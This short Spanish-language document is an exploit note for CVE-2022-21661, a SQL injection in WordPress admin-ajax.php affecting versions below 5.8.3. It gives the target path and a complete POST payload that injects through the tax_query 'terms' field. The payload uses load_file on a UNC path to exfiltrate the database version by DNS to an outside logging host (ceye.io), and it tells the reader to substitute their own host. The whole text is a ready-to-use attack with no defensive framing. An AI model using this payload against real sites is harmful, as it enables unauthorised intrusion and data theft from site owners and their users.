
Exploit para la vulnerabilidad de inyección SQL CVE-2022-21661 de WordPress en admin-ajax.php, utilizando exfiltración de datos fuera de banda a través de DNS para versiones inferiores a 5.8.3.
#version<5.8.3
ruta: http://your target/wp-admin/admin-ajax.php
El tipo de inyección es fuera de banda, debes especificar tu propio dnslog y reemplazar ceye.io
DATOS POST: {"tax_query":[{"field":"term_taxonomy_id","terms":["1) and if((select load_file(concat('\\',(select version()),'.27s601.ceye.io\abc'))),1,1)-- a"]}]}